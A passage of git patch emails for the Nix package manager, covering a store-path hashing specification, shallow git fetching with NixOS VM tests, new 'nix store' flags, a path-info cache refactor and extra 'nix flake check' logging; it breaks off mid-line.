+    the hash of the [Nix Archive (NAR)] serialization of the [file system object](@docroot@/store/file-system-object.md) of the store object.
+
+  - if `` = `output:`:
+
+    - For input-addressed derivation outputs:
+
+      the [ATerm](@docroot@/protocols/derivation-aterm.md) serialization of the derivation modulo fixed output derivations.
+
+    - For content-addressed store paths:
+
+      the string `fixed:out:::`, where
+
+      - `` = one of:
+
+        - `r:` for hashes of the [Nix Archive (NAR)] (arbitrary file system object) serialization
+
+        - `` (empty string) for hashes of the flat (single file) serialization
+
+      - `` = `md5`, `sha1` or `sha256`
+
+      - `` = base-16 representation of the path or flat hash of the contents of the path (or expected contents of the path for fixed-output derivations).
+
+      Note that `` = `out`, regardless of the name part of the store path.
+      Also note that NAR + SHA-256 must not use this case, and instead must use the `` = `source:...` case.
+
+[Nix Archive (NAR)]: @docroot@/glossary.md#gloss-NAR
+[sha-256]: https://en.m.wikipedia.org/wiki/SHA-256
+
+## Historical Note
+
+The `` = `source:...` and `` = `output:out` grammars technically overlap, in that both can represent data hashed by its SHA-256 NAR serialization.
+
+The original reason for this way of computing names was to prevent name collisions (for security).
+For instance, the thinking was that it shouldn't be feasible to come up with a derivation whose output path collides with the path for a copied source.
+The former would have an `` starting with `output:out:`, while the latter would have an `` starting with `source:`.
+
+Since `64519cfd657d024ae6e2bb74cb21ad21b886fd2a` (2008), however, it was decided that separating derivation-produced vs manually-hashed content-addressed data like this was not useful.
+Now, data that is to be SHA-256 + NAR-serialization content-addressed always uses the `source:...` construction, regardless of how it was produced (manually or by derivation).
+This allows freely switching between using [fixed-output derivations](@docroot@/glossary.md#gloss-fixed-output-derivation) for fetching, and fetching out-of-band and then manually adding.
+It also removes the ambiguity from the grammar.
diff --git a/src/libstore/store-api.cc b/src/libstore/store-api.cc
index 0c37ecd30..dcfe5991d 100644
--- a/src/libstore/store-api.cc
+++ b/src/libstore/store-api.cc
@@ -65,85 +65,13 @@ StorePath Store::followLinksToStorePath(std::string_view path) const
 }
 
 
-/* Store paths have the following form:
+/*
+The exact specification of store paths is in `protocols/store-path.md`
+in the Nix manual. These few functions implement that specification.
 
-    = /-
-
-   where
-
-    = the location of the Nix store, usually /nix/store
-
-    = a human readable name for the path, typically obtained
-     from the name attribute of the derivation, or the name of the
-     source file from which the store path is created.  For derivation
-     outputs other than the default "out" output, the string "-"
-     is suffixed to .
-
-    = base-32 representation of the first 160 bits of a SHA-256
-     hash of ; the hash part of the store name
-
-    = the string ":sha256:

::"; - note that it includes the location of the store as well as the - name to make sure that changes to either of those are reflected - in the hash (e.g. you won't get /nix/store/-name1 and - /nix/store/-name2 with equal hash parts). - - = one of: - "text:::..." - for plain text files written to the store using - addTextToStore(); ... are the store paths referenced - by this path, in the form described by - "source:::...::self" - for paths copied to the store using addToStore() when recursive - = true and hashAlgo = "sha256". Just like in the text case, we - can have the store paths referenced by the path. - Additionally, we can have an optional :self label to denote self - reference. - "output:" - for either the outputs created by derivations, OR paths copied - to the store using addToStore() with recursive != true or - hashAlgo != "sha256" (in that case "source" is used; it's - silly, but it's done that way for compatibility). is the - name of the output (usually, "out"). - -

= base-16 representation of a SHA-256 hash of - - = - if = "text:...": - the string written to the resulting store path - if = "source:...": - the serialisation of the path from which this store path is - copied, as returned by hashPath() - if = "output:": - for non-fixed derivation outputs: - the derivation (see hashDerivationModulo() in - primops.cc) - for paths copied by addToStore() or produced by fixed-output - derivations: - the string "fixed:out:::", where - = "r:" for recursive (path) hashes, or "" for flat - (file) hashes - = "md5", "sha1" or "sha256" - = base-16 representation of the path or flat hash of - the contents of the path (or expected contents of the - path for fixed-output derivations) - - Note that since an output derivation has always type output, while - something added by addToStore can have type output or source depending - on the hash, this means that the same input can be hashed differently - if added to the store via addToStore or via a derivation, in the sha256 - recursive case. - - It would have been nicer to handle fixed-output derivations under - "source", e.g. have something like "source:", but we're - stuck with this for now... - - The main reason for this way of computing names is to prevent name - collisions (for security). For instance, it shouldn't be feasible - to come up with a derivation whose output path collides with the - path for a copied source. The former would have a starting with - "output:out:", while the latter would have a starting with - "source:". +If changes to these functions go beyond mere implementation changes and +also update the user-visible behavior, please update the specification +to match.
*/ From 28d7db249ace91c10a9ad6cb6d11a6c2109929fb Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?= <7226587+thufschmitt@users.noreply.github.com> Date: Fri, 19 Jan 2024 10:10:00 +0100 Subject: [PATCH 308/654] Remove a nonsensical shorthand flag in `nix store add` `-n` was an alias for `--mode`, but that seems to just be a copy-paste error as it doesn't make sense. `--mode` probably doesn't need a shorthand flag at all, so remove it. Noticed in https://github.com/NixOS/nix/pull/9809#issuecomment-1899890555 --- src/nix/add-to-store.cc | 1 - 1 file changed, 1 deletion(-) diff --git a/src/nix/add-to-store.cc b/src/nix/add-to-store.cc index 64a43ecfa..171848002 100644 --- a/src/nix/add-to-store.cc +++ b/src/nix/add-to-store.cc @@ -38,7 +38,6 @@ struct CmdAddToStore : MixDryRun, StoreCommand addFlag({ .longName = "mode", - .shortName = 'n', .description = R"( How to compute the hash of the input. One of: From bc00fa46472c56ccfddc2d6e81453be537d2e051 Mon Sep 17 00:00:00 2001 From: DavHau Date: Fri, 19 Jan 2024 15:59:15 +0700 Subject: [PATCH 309/654] fetchTree/fetchGit: re-enable shallow fetching Add several tests for git fetching: - shallow-cache-separation: can fetch the same repo shallowly and non-shallowly - shallow-ignore-ref: ensure that ref gets ignored when shallow=true is set - ssh-shallow: can fetch a git repo via ssh using shallow=1 --- src/libfetchers/git-utils.cc | 9 ++- src/libfetchers/git.cc | 16 ++++-- .../shallow-cache-separation/default.nix | 57 +++++++++++++++++++ .../test-cases/shallow-ignore-ref/default.nix | 40 +++++++++++++ .../test-cases/ssh-shallow/default.nix | 52 +++++++++++++++++ .../fetch-git/testsupport/gitea-repo.nix | 2 +- 6 files changed, 168 insertions(+), 8 deletions(-) create mode 100644 tests/nixos/fetch-git/test-cases/shallow-cache-separation/default.nix create mode 100644 tests/nixos/fetch-git/test-cases/shallow-ignore-ref/default.nix create mode 100644 tests/nixos/fetch-git/test-cases/ssh-shallow/default.nix diff 
--git a/src/libfetchers/git-utils.cc b/src/libfetchers/git-utils.cc index 911c16c4b..382a363f0 100644 --- a/src/libfetchers/git-utils.cc +++ b/src/libfetchers/git-utils.cc @@ -387,13 +387,20 @@ struct GitRepoImpl : GitRepo, std::enable_shared_from_this // then use code that was removed in this commit (see blame) auto dir = this->path; + Strings gitArgs; + if (shallow) { + gitArgs = { "-C", dir.abs(), "fetch", "--quiet", "--force", "--depth", "1", "--", url, refspec }; + } + else { + gitArgs = { "-C", dir.abs(), "fetch", "--quiet", "--force", "--", url, refspec }; + } runProgram(RunOptions { .program = "git", .searchPath = true, // FIXME: git stderr messes up our progress indicator, so // we're using --quiet for now. Should process its stderr. - .args = { "-C", path.abs(), "fetch", "--quiet", "--force", "--", url, refspec }, + .args = gitArgs, .input = {}, .isInteractive = true }); diff --git a/src/libfetchers/git.cc b/src/libfetchers/git.cc index 6ecb7a4ea..f9a1cb1bc 100644 --- a/src/libfetchers/git.cc +++ b/src/libfetchers/git.cc @@ -50,10 +50,12 @@ bool touchCacheFile(const Path & path, time_t touch_time) return lutimes(path.c_str(), times) == 0; } -Path getCachePath(std::string_view key) +Path getCachePath(std::string_view key, bool shallow) { - return getCacheDir() + "/nix/gitv3/" + - hashString(HashAlgorithm::SHA256, key).to_string(HashFormat::Nix32, false); + return getCacheDir() + + "/nix/gitv3/" + + hashString(HashAlgorithm::SHA256, key).to_string(HashFormat::Nix32, false) + + (shallow ? "-shallow" : ""); } // Returns the name of the HEAD branch. @@ -92,7 +94,8 @@ std::optional readHead(const Path & path) // Persist the HEAD ref from the remote repo in the local cached repo. 
bool storeCachedHead(const std::string & actualUrl, const std::string & headRef) { - Path cacheDir = getCachePath(actualUrl); + // set shallow=false as HEAD will never be queried for a shallow repo + Path cacheDir = getCachePath(actualUrl, false); try { runProgram("git", true, { "-C", cacheDir, "--git-dir", ".", "symbolic-ref", "--", "HEAD", headRef }); } catch (ExecError &e) { @@ -107,7 +110,8 @@ std::optional readHeadCached(const std::string & actualUrl) { // Create a cache path to store the branch of the HEAD ref. Append something // in front of the URL to prevent collision with the repository itself. - Path cacheDir = getCachePath(actualUrl); + // set shallow=false as HEAD will never be queried for a shallow repo + Path cacheDir = getCachePath(actualUrl, false); Path headRefFile = cacheDir + "/HEAD"; time_t now = time(0); @@ -508,7 +512,7 @@ struct GitInputScheme : InputScheme if (!input.getRev()) input.attrs.insert_or_assign("rev", GitRepo::openRepo(CanonPath(repoDir))->resolveRef(ref).gitRev()); } else { - Path cacheDir = getCachePath(repoInfo.url); + Path cacheDir = getCachePath(repoInfo.url, getShallowAttr(input)); repoDir = cacheDir; repoInfo.gitDir = "."; diff --git a/tests/nixos/fetch-git/test-cases/shallow-cache-separation/default.nix b/tests/nixos/fetch-git/test-cases/shallow-cache-separation/default.nix new file mode 100644 index 000000000..57561e74b --- /dev/null +++ b/tests/nixos/fetch-git/test-cases/shallow-cache-separation/default.nix @@ -0,0 +1,57 @@ +{ + description = "can fetch the same repo shallowly and non-shallowly"; + script = '' + # create branch1 off of main + client.succeed(f""" + echo chiang-mai > {repo.path}/thailand \ + && {repo.git} add thailand \ + && {repo.git} commit -m 'commit1' \ + \ + && {repo.git} push origin --all + """) + + # save the revision + mainRev = client.succeed(f""" + {repo.git} rev-parse main + """).strip() + + # fetch shallowly + revCountShallow = client.succeed(f""" + nix eval --impure --expr ' + 
(builtins.fetchGit {{ + url = "{repo.remote}"; + rev = "{mainRev}"; + shallow = true; + }}).revCount + ' + """).strip() + # ensure the revCount is 0 + assert revCountShallow == "0", f"revCountShallow should be 0, but is {revCountShallow}" + + # fetch non-shallowly + revCountNonShallow = client.succeed(f""" + nix eval --impure --expr ' + (builtins.fetchGit {{ + url = "{repo.remote}"; + rev = "{mainRev}"; + shallow = false; + }}).revCount + ' + """).strip() + # ensure the revCount is 1 + assert revCountNonShallow == "1", f"revCountNonShallow should be 1, but is {revCountNonShallow}" + + # fetch shallowly again + revCountShallow2 = client.succeed(f""" + nix eval --impure --expr ' + (builtins.fetchGit {{ + url = "{repo.remote}"; + rev = "{mainRev}"; + shallow = true; + }}).revCount + ' + """).strip() + # ensure the revCount is 0 + assert revCountShallow2 == "0", f"revCountShallow2 should be 0, but is {revCountShallow2}" + ''; +} diff --git a/tests/nixos/fetch-git/test-cases/shallow-ignore-ref/default.nix b/tests/nixos/fetch-git/test-cases/shallow-ignore-ref/default.nix new file mode 100644 index 000000000..456ee8341 --- /dev/null +++ b/tests/nixos/fetch-git/test-cases/shallow-ignore-ref/default.nix @@ -0,0 +1,40 @@ +{ + description = "ensure that ref gets ignored when shallow=true is set"; + script = '' + # create branch1 off of main + client.succeed(f""" + echo chiang-mai > {repo.path}/thailand \ + && {repo.git} add thailand \ + && {repo.git} commit -m 'commit1' \ + \ + && {repo.git} checkout -b branch1 main \ + && echo bangkok > {repo.path}/thailand \ + && {repo.git} add thailand \ + && {repo.git} commit -m 'commit2' \ + \ + && {repo.git} push origin --all + """) + + # save the revisions + mainRev = client.succeed(f""" + {repo.git} rev-parse main + """).strip() + branch1Rev = client.succeed(f""" + {repo.git} rev-parse branch1 + """).strip() + + # Ensure that ref gets ignored when fetching shallowly. 
+ # This would fail if the ref was respected, as branch1Rev is not on main. + client.succeed(f""" + nix eval --impure --raw --expr ' + (builtins.fetchGit {{ + url = "{repo.remote}"; + rev = "{branch1Rev}"; + ref = "main"; + shallow = true; + }}) + ' + """) + + ''; +} diff --git a/tests/nixos/fetch-git/test-cases/ssh-shallow/default.nix b/tests/nixos/fetch-git/test-cases/ssh-shallow/default.nix new file mode 100644 index 000000000..979512af9 --- /dev/null +++ b/tests/nixos/fetch-git/test-cases/ssh-shallow/default.nix @@ -0,0 +1,52 @@ +{ + description = "can fetch a git repo via ssh using shallow=1"; + script = '' + # add a file to the repo + client.succeed(f""" + echo chiang-mai > {repo.path}/thailand \ + && {repo.git} add thailand \ + && {repo.git} commit -m 'commit1' + """) + + # memoize the revision + rev1 = client.succeed(f""" + {repo.git} rev-parse HEAD + """).strip() + + # push to the server + client.succeed(f""" + {repo.git} push origin-ssh main + """) + + fetchGit_expr = f""" + builtins.fetchGit {{ + url = "{repo.remote_ssh}"; + rev = "{rev1}"; + shallow = true; + }} + """ + + # fetch the repo via nix + fetched1 = client.succeed(f""" + nix eval --impure --raw --expr '({fetchGit_expr}).outPath' + """) + + # check if the committed file is there + client.succeed(f""" + test -f {fetched1}/thailand + """) + + # check if the revision is the same + rev1_fetched = client.succeed(f""" + nix eval --impure --raw --expr '({fetchGit_expr}).rev' + """).strip() + assert rev1 == rev1_fetched, f"rev1: {rev1} != rev1_fetched: {rev1_fetched}" + + # check if revCount is 1 + revCount1 = client.succeed(f""" + nix eval --impure --expr '({fetchGit_expr}).revCount' + """).strip() + print(f"revCount1: {revCount1}") + assert revCount1 == '0', f"rev count is not 0 but {revCount1}" + ''; +} diff --git a/tests/nixos/fetch-git/testsupport/gitea-repo.nix b/tests/nixos/fetch-git/testsupport/gitea-repo.nix index a3ad65ca4..e9f4adcc1 100644 --- 
a/tests/nixos/fetch-git/testsupport/gitea-repo.nix +++ b/tests/nixos/fetch-git/testsupport/gitea-repo.nix @@ -72,4 +72,4 @@ in """) ''; }; -} \ No newline at end of file +} From 75a6e6dd0eb60f3bcaaa3b33b085fb542638eb44 Mon Sep 17 00:00:00 2001 From: Yuxuan Shui Date: Thu, 18 Jan 2024 16:39:34 +0000 Subject: [PATCH 310/654] Add --unpack to nix store prefetch-file --- src/nix/prefetch.cc | 11 ++++++++++- 1 file changed, 10 insertions(+), 1 deletion(-) diff --git a/src/nix/prefetch.cc b/src/nix/prefetch.cc index b5d619006..84b79ea28 100644 --- a/src/nix/prefetch.cc +++ b/src/nix/prefetch.cc @@ -262,6 +262,7 @@ struct CmdStorePrefetchFile : StoreCommand, MixJSON { std::string url; bool executable = false; + bool unpack = false; std::optional name; HashAlgorithm hashAlgo = HashAlgorithm::SHA256; std::optional expectedHash; @@ -294,6 +295,14 @@ struct CmdStorePrefetchFile : StoreCommand, MixJSON .handler = {&executable, true}, }); + addFlag({ + .longName = "unpack", + .description = + "Unpack the archive (which must be a tarball or zip file) and add " + "the result to the Nix store.", + .handler = {&unpack, true}, + }); + expectArg("url", &url); } @@ -310,7 +319,7 @@ struct CmdStorePrefetchFile : StoreCommand, MixJSON } void run(ref store) override { - auto [storePath, hash] = prefetchFile(store, url, name, hashAlgo, expectedHash, false, executable); + auto [storePath, hash] = prefetchFile(store, url, name, hashAlgo, expectedHash, unpack, executable); if (json) { auto res = nlohmann::json::object(); From 8983ee8b2e0c10e6cac672a5a7ada4698235a62e Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Wed, 17 Jan 2024 17:54:03 +0100 Subject: [PATCH 311/654] refactor: Un-callback transform Store::queryPathInfoFromClientCache This part of the code was not necessarily callback based. Removing CPS is always nice; particularly if there's no loss of functionality, like here. 
--- src/libstore/store-api.cc | 18 +++++++++--------- src/libstore/store-api.hh | 8 ++++---- 2 files changed, 13 insertions(+), 13 deletions(-) diff --git a/src/libstore/store-api.cc b/src/libstore/store-api.cc index 66bc95625..f237578e5 100644 --- a/src/libstore/store-api.cc +++ b/src/libstore/store-api.cc @@ -685,8 +685,7 @@ static bool goodStorePath(const StorePath & expected, const StorePath & actual) && (expected.name() == Store::MissingName || expected.name() == actual.name()); } -bool Store::queryPathInfoFromClientCache(const StorePath & storePath, - Callback> & callback) +std::optional> Store::queryPathInfoFromClientCache(const StorePath & storePath) { auto hashPart = std::string(storePath.hashPart()); @@ -696,8 +695,7 @@ bool Store::queryPathInfoFromClientCache(const StorePath & storePath, stats.narInfoReadAverted++; if (!res->didExist()) throw InvalidPath("path '%s' is not valid", printStorePath(storePath)); - callback(ref(res->value)); - return true; + return ref(res->value); } } @@ -713,12 +711,11 @@ bool Store::queryPathInfoFromClientCache(const StorePath & storePath, !goodStorePath(storePath, res.second->path)) throw InvalidPath("path '%s' is not valid", printStorePath(storePath)); } - callback(ref(res.second)); - return true; + return ref(res.second); } } - return false; + return std::nullopt; } @@ -728,8 +725,11 @@ void Store::queryPathInfo(const StorePath & storePath, auto hashPart = std::string(storePath.hashPart()); try { - if (queryPathInfoFromClientCache(storePath, callback)) - return; + auto r = queryPathInfoFromClientCache(storePath); + if (r.has_value()) { + ref & info = *r; + return callback(ref(info)); + } } catch (...) 
{ return callback.rethrow(); } auto callbackPtr = std::make_shared(std::move(callback)); diff --git a/src/libstore/store-api.hh b/src/libstore/store-api.hh index 2a1092d9e..e47f2c768 100644 --- a/src/libstore/store-api.hh +++ b/src/libstore/store-api.hh @@ -285,14 +285,14 @@ public: /** * NOTE: this is not the final interface - to be modified in next commit. * - * Asynchronous version that only queries the local narinfo cache and not + * Version of queryPathInfo() that only queries the local narinfo cache and not * the actual store. * - * @return true if the path was known and the callback invoked - * @return false if the path was not known and the callback not invoked + * @return `std::make_optional(vpi)` if the path is known + * @return `std::null_opt` if the path was not known to be valid or invalid * @throw InvalidPathError if the path is known to be invalid */ - bool queryPathInfoFromClientCache(const StorePath & path, Callback> & callback); + std::optional> queryPathInfoFromClientCache(const StorePath & path); /** * Query the information about a realisation. From d19627e8b4c3c09b0cc1329a9acaa8e5b070f26e Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Fri, 19 Jan 2024 17:00:39 +0100 Subject: [PATCH 312/654] refactor: Remove throw from queryPathInfoFromClientCache Return a value instead of throwing. Rather than the more trivial refactor of wrapping the return value in another std::optional, we retain the meaning of the outer optional: "we know at least something." 
So we have changed: return nullopt -> return nullopt throw InvalidPath -> return make_optional(nullptr) return vpi -> return make_optional(vpi) --- src/libstore/store-api.cc | 22 ++++++++++++++-------- src/libstore/store-api.hh | 10 ++++------ 2 files changed, 18 insertions(+), 14 deletions(-) diff --git a/src/libstore/store-api.cc b/src/libstore/store-api.cc index f237578e5..2cd40d510 100644 --- a/src/libstore/store-api.cc +++ b/src/libstore/store-api.cc @@ -685,7 +685,8 @@ static bool goodStorePath(const StorePath & expected, const StorePath & actual) && (expected.name() == Store::MissingName || expected.name() == actual.name()); } -std::optional> Store::queryPathInfoFromClientCache(const StorePath & storePath) + +std::optional> Store::queryPathInfoFromClientCache(const StorePath & storePath) { auto hashPart = std::string(storePath.hashPart()); @@ -693,9 +694,10 @@ std::optional> Store::queryPathInfoFromClientCache(cons auto res = state.lock()->pathInfoCache.get(std::string(storePath.to_string())); if (res && res->isKnownNow()) { stats.narInfoReadAverted++; - if (!res->didExist()) - throw InvalidPath("path '%s' is not valid", printStorePath(storePath)); - return ref(res->value); + if (res->didExist()) + return std::make_optional(res->value); + else + return std::make_optional(nullptr); } } @@ -709,9 +711,10 @@ std::optional> Store::queryPathInfoFromClientCache(cons res.first == NarInfoDiskCache::oInvalid ? 
PathInfoCacheValue{} : PathInfoCacheValue{ .value = res.second }); if (res.first == NarInfoDiskCache::oInvalid || !goodStorePath(storePath, res.second->path)) - throw InvalidPath("path '%s' is not valid", printStorePath(storePath)); + return std::make_optional(nullptr); } - return ref(res.second); + assert(res.second); + return std::make_optional(res.second); } } @@ -727,8 +730,11 @@ void Store::queryPathInfo(const StorePath & storePath, try { auto r = queryPathInfoFromClientCache(storePath); if (r.has_value()) { - ref & info = *r; - return callback(ref(info)); + std::shared_ptr & info = *r; + if (info) + return callback(ref(info)); + else + throw InvalidPath("path '%s' is not valid", printStorePath(storePath)); } } catch (...) { return callback.rethrow(); } diff --git a/src/libstore/store-api.hh b/src/libstore/store-api.hh index e47f2c768..2f8a9440e 100644 --- a/src/libstore/store-api.hh +++ b/src/libstore/store-api.hh @@ -283,16 +283,14 @@ public: Callback> callback) noexcept; /** - * NOTE: this is not the final interface - to be modified in next commit. - * * Version of queryPathInfo() that only queries the local narinfo cache and not * the actual store. * - * @return `std::make_optional(vpi)` if the path is known - * @return `std::null_opt` if the path was not known to be valid or invalid - * @throw InvalidPathError if the path is known to be invalid + * @return `std::nullopt` if nothing is known about the path in the local narinfo cache. + * @return `std::make_optional(nullptr)` if the path is known to not exist. + * @return `std::make_optional(validPathInfo)` if the path is known to exist. */ - std::optional> queryPathInfoFromClientCache(const StorePath & path); + std::optional> queryPathInfoFromClientCache(const StorePath & path); /** * Query the information about a realisation. 
From 356352c3709f69b6d11ed7f14ffa586219170908 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Fri, 19 Jan 2024 01:07:26 -0500 Subject: [PATCH 313/654] Add missing `--hash-algo` flag to `nix store add` --- doc/manual/rl-next/nix-store-add.md | 7 +++++++ src/nix/add-to-store.cc | 7 +++++-- tests/functional/add.sh | 2 ++ 3 files changed, 14 insertions(+), 2 deletions(-) create mode 100644 doc/manual/rl-next/nix-store-add.md diff --git a/doc/manual/rl-next/nix-store-add.md b/doc/manual/rl-next/nix-store-add.md new file mode 100644 index 000000000..d55711569 --- /dev/null +++ b/doc/manual/rl-next/nix-store-add.md @@ -0,0 +1,7 @@ +--- +synopsis: Give `nix store add` a `--hash-algo` flag +prs: 9809 +--- + +Adds a missing feature that was present in the old CLI, and matches our +plans to have similar flags for `nix hash convert` and `hash hash path`. diff --git a/src/nix/add-to-store.cc b/src/nix/add-to-store.cc index 171848002..f2dbe8a2c 100644 --- a/src/nix/add-to-store.cc +++ b/src/nix/add-to-store.cc @@ -22,6 +22,7 @@ struct CmdAddToStore : MixDryRun, StoreCommand Path path; std::optional namePart; ContentAddressMethod caMethod = FileIngestionMethod::Recursive; + HashAlgorithm hashAlgo = HashAlgorithm::SHA256; CmdAddToStore() { @@ -51,6 +52,8 @@ struct CmdAddToStore : MixDryRun, StoreCommand this->caMethod = parseIngestionMethod(s); }}, }); + + addFlag(Flag::mkHashAlgoFlag("hash-algo", &hashAlgo)); } void run(ref store) override @@ -63,9 +66,9 @@ struct CmdAddToStore : MixDryRun, StoreCommand auto storePath = dryRun ? 
store->computeStorePath( - *namePart, accessor, path2, caMethod, HashAlgorithm::SHA256, {}).first + *namePart, accessor, path2, caMethod, hashAlgo, {}).first : store->addToStoreSlow( - *namePart, accessor, path2, caMethod, HashAlgorithm::SHA256, {}).path; + *namePart, accessor, path2, caMethod, hashAlgo, {}).path; logger->cout("%s", store->printStorePath(storePath)); } diff --git a/tests/functional/add.sh b/tests/functional/add.sh index d0fedcb25..762e01dbe 100644 --- a/tests/functional/add.sh +++ b/tests/functional/add.sh @@ -37,9 +37,11 @@ clearStore path3=$(nix store add-path ./dummy) [[ "$path1" == "$path2" ]] [[ "$path1" == "$path3" ]] + path4=$(nix store add --mode nar --hash-algo sha1 ./dummy) ) ( path1=$(nix store add --mode flat ./dummy) path2=$(nix store add-file ./dummy) [[ "$path1" == "$path2" ]] + path4=$(nix store add --mode flat --hash-algo sha1 ./dummy) ) From 49221493e243c4d10e69e7465a21be53902e16a8 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Thu, 31 Aug 2023 11:34:52 -0700 Subject: [PATCH 314/654] Log what `nix flake check` does There's still room for improvement, but this produces much more informative output with `-v`: ``` $ nix flake check -v evaluating flake... checking flake output 'checks'... checking derivation checks.aarch64-darwin.ghcid-ng-tests... checking derivation checks.aarch64-darwin.ghcid-ng-clippy... checking derivation checks.aarch64-darwin.ghcid-ng-doc... checking derivation checks.aarch64-darwin.ghcid-ng-fmt... checking derivation checks.aarch64-darwin.ghcid-ng-audit... checking flake output 'packages'... checking derivation packages.aarch64-darwin.ghcid-ng... checking derivation packages.aarch64-darwin.ghcid-ng-tests... checking derivation packages.aarch64-darwin.default... checking flake output 'apps'... checking flake output 'devShells'... checking derivation devShells.aarch64-darwin.default... running flake checks... 
warning: The check omitted these incompatible systems: aarch64-linux, x86_64-darwin, x86_64-linux Use '--all-systems' to check all. ``` --- src/nix/flake.cc | 18 ++++++++++++++---- 1 file changed, 14 insertions(+), 4 deletions(-) diff --git a/src/nix/flake.cc b/src/nix/flake.cc index bebc62deb..0103a9cd9 100644 --- a/src/nix/flake.cc +++ b/src/nix/flake.cc @@ -395,6 +395,8 @@ struct CmdFlakeCheck : FlakeCommand auto checkDerivation = [&](const std::string & attrPath, Value & v, const PosIdx pos) -> std::optional { try { + Activity act(*logger, lvlInfo, actUnknown, + fmt("checking derivation %s", attrPath)); auto packageInfo = getDerivation(*state, v, false); if (!packageInfo) throw Error("flake attribute '%s' is not a derivation", attrPath); @@ -427,6 +429,8 @@ struct CmdFlakeCheck : FlakeCommand auto checkOverlay = [&](const std::string & attrPath, Value & v, const PosIdx pos) { try { + Activity act(*logger, lvlInfo, actUnknown, + fmt("checking overlay %s", attrPath)); state->forceValue(v, pos); if (!v.isLambda()) { throw Error("overlay is not a function, but %s instead", showType(v)); @@ -449,6 +453,8 @@ struct CmdFlakeCheck : FlakeCommand auto checkModule = [&](const std::string & attrPath, Value & v, const PosIdx pos) { try { + Activity act(*logger, lvlInfo, actUnknown, + fmt("checking NixOS module %s", attrPath)); state->forceValue(v, pos); } catch (Error & e) { e.addTrace(resolve(pos), hintfmt("while checking the NixOS module '%s'", attrPath)); @@ -460,6 +466,8 @@ struct CmdFlakeCheck : FlakeCommand checkHydraJobs = [&](const std::string & attrPath, Value & v, const PosIdx pos) { try { + Activity act(*logger, lvlInfo, actUnknown, + fmt("checking Hydra job %s", attrPath)); state->forceAttrs(v, pos, ""); if (state->isDerivation(v)) @@ -469,7 +477,7 @@ struct CmdFlakeCheck : FlakeCommand state->forceAttrs(*attr.value, attr.pos, ""); auto attrPath2 = concatStrings(attrPath, ".", state->symbols[attr.name]); if (state->isDerivation(*attr.value)) { - Activity 
act(*logger, lvlChatty, actUnknown, + Activity act(*logger, lvlInfo, actUnknown, fmt("checking Hydra job '%s'", attrPath2)); checkDerivation(attrPath2, *attr.value, attr.pos); } else @@ -484,7 +492,7 @@ struct CmdFlakeCheck : FlakeCommand auto checkNixOSConfiguration = [&](const std::string & attrPath, Value & v, const PosIdx pos) { try { - Activity act(*logger, lvlChatty, actUnknown, + Activity act(*logger, lvlInfo, actUnknown, fmt("checking NixOS configuration '%s'", attrPath)); Bindings & bindings(*state->allocBindings(0)); auto vToplevel = findAlongAttrPath(*state, "config.system.build.toplevel", bindings, v).first; @@ -499,7 +507,7 @@ struct CmdFlakeCheck : FlakeCommand auto checkTemplate = [&](const std::string & attrPath, Value & v, const PosIdx pos) { try { - Activity act(*logger, lvlChatty, actUnknown, + Activity act(*logger, lvlInfo, actUnknown, fmt("checking template '%s'", attrPath)); state->forceAttrs(v, pos, ""); @@ -533,6 +541,8 @@ struct CmdFlakeCheck : FlakeCommand auto checkBundler = [&](const std::string & attrPath, Value & v, const PosIdx pos) { try { + Activity act(*logger, lvlInfo, actUnknown, + fmt("checking bundler %s", attrPath)); state->forceValue(v, pos); if (!v.isLambda()) throw Error("bundler must be a function"); @@ -552,7 +562,7 @@ struct CmdFlakeCheck : FlakeCommand enumerateOutputs(*state, *vFlake, [&](const std::string & name, Value & vOutput, const PosIdx pos) { - Activity act(*logger, lvlChatty, actUnknown, + Activity act(*logger, lvlInfo, actUnknown, fmt("checking flake output '%s'", name)); try { From 9404ce36e4edd1df12892089bdab1ceb7d4d7a97 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Fri, 1 Sep 2023 13:09:01 -0700 Subject: [PATCH 315/654] Print derivation paths Also be more consistent with quotes around attribute paths --- src/nix/flake.cc | 20 +++++++++++++------- 1 file changed, 13 insertions(+), 7 deletions(-) diff --git a/src/nix/flake.cc b/src/nix/flake.cc index 0103a9cd9..850ea77da 100644 --- a/src/nix/flake.cc 
+++ b/src/nix/flake.cc @@ -400,8 +400,16 @@ struct CmdFlakeCheck : FlakeCommand auto packageInfo = getDerivation(*state, v, false); if (!packageInfo) throw Error("flake attribute '%s' is not a derivation", attrPath); - // FIXME: check meta attributes - return packageInfo->queryDrvPath(); + else { + // FIXME: check meta attributes + auto storePath = packageInfo->queryDrvPath(); + if (storePath) { + logger->log(lvlInfo, + fmt("derivation evaluated to %s", + store->printStorePath(storePath.value()))); + } + return storePath; + } } catch (Error & e) { e.addTrace(resolve(pos), hintfmt("while checking the derivation '%s'", attrPath)); reportError(e); @@ -430,7 +438,7 @@ struct CmdFlakeCheck : FlakeCommand auto checkOverlay = [&](const std::string & attrPath, Value & v, const PosIdx pos) { try { Activity act(*logger, lvlInfo, actUnknown, - fmt("checking overlay %s", attrPath)); + fmt("checking overlay '%s'", attrPath)); state->forceValue(v, pos); if (!v.isLambda()) { throw Error("overlay is not a function, but %s instead", showType(v)); @@ -454,7 +462,7 @@ struct CmdFlakeCheck : FlakeCommand auto checkModule = [&](const std::string & attrPath, Value & v, const PosIdx pos) { try { Activity act(*logger, lvlInfo, actUnknown, - fmt("checking NixOS module %s", attrPath)); + fmt("checking NixOS module '%s'", attrPath)); state->forceValue(v, pos); } catch (Error & e) { e.addTrace(resolve(pos), hintfmt("while checking the NixOS module '%s'", attrPath)); @@ -466,8 +474,6 @@ struct CmdFlakeCheck : FlakeCommand checkHydraJobs = [&](const std::string & attrPath, Value & v, const PosIdx pos) { try { - Activity act(*logger, lvlInfo, actUnknown, - fmt("checking Hydra job %s", attrPath)); state->forceAttrs(v, pos, ""); if (state->isDerivation(v)) @@ -542,7 +548,7 @@ struct CmdFlakeCheck : FlakeCommand auto checkBundler = [&](const std::string & attrPath, Value & v, const PosIdx pos) { try { Activity act(*logger, lvlInfo, actUnknown, - fmt("checking bundler %s", attrPath)); + 
